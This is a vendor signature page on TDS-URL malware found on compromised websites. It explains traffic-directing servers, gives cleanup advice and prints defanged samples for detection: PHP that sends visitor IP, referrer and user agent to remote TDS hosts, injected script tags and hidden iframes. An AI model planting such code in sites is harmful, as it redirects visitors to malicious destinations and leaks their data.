Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.malware.tds-url

php.malware.tds-url

Malware on compromised websites rarely load content from final source or redirect to the final destination. In most cases they pass the traffic
to intermediary servers (TDS or Traffic Directing Servers) that filter the traffic and pass it along to appropriate destination. E.g. TDS may block traffic from bots
and ineligible countries, redirect to different URLs traffic from desktop and mobile users, from PC and Mac user, from Internet Explorer and Chrome users, etc.
Some of such TDS URLs have common patterns that we detect.

Affecting

TDS URLs can be found in various different types of malware.

Cleanup

Inspect your site's files looking for suspicious code or files that you don't recognize. Pay a special attention to URLs that contain words like "tds", "sutra" in them.
Also you can sign up with us and let our team remove the malware for you.

Dump

Examples of code that includes TDS URLs

$sFullUrl = 'http://wpcontrol.org/tds/?ip=' . rawurlencode($_SERVER['REMOTE_ADDR']) . '&ref=' . rawurlencode(mb_strtolower($_SERVER['HTTP_REFERER'])).'&useragent='.rawurlencode(mb_strtolower($_SERVER['HTTP_USER_AGENT'])).'&domain='.rawurlencode($HOST).'&keyword=' . rawurlencode(str_replace("-", " ", $Q));

...
hxxp://92.62.100.57/stds/go.php?sid=1
...
hxxp://abbcp.cn/tds_a/go.php/go.php?id=2
..
hxxp://ilovehash.cn/rastatds/go.php?sid=5
...
hxxp://server90.org/tdska/go.php?sid=3
...
<s cript>d ocument.write("<script src=""+"hxxp://itsallbreaksoft.net/tds/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+ encodeURIComponent(document.URL)+"&default_keyword=notdefine"+""></script>");</script> <script> if(typeof(h)=="undefined"){ document.write("<iframe src='http://itsallbreaksoft.net/tds/in.cgi?3&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+ encodeURIComponent(document.URL)+"&default_keyword=notdefine' width=1 height=1 border=0 frameborder=0></iframe>"); } else if(h.indexOf("http:")==0){ window.location=h; } </script>
...
<s cript src="hxxp://sbdtds.com/acounter.js?r=&c=SS%3DQ0%3Dc2l0ZTp3d3cuYnVpbGRpbmc0My5jb20gY2lhbGlz%3B%20PREF%3DID%3Da410dd38b1b6c51e%3AU%3D5ab45939c0514050%3AFF%3D4%3ATB%3D2%3ALD%3Den%3ANR%3D10%3ATM%3D1270631059%3ALM%3D1270717308%3AS%3DUJYqUN_u7g7V6v49%3B%20GZ%3DZ%3D1%3B%20popunder%3Dyes%3B%20popundr%3Dyes&i=bb0777983f2c8f3e3c0c05f523f89952e&h=springfed"></script>
...
<i frame src="hxxp://85.234.190.62/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>
...
<i frame name=c73ad src='hxxp://counterweb.cn/sutra/in.cgi?default?405548be0d3' width=405 height=485 style='display: none'></iframe>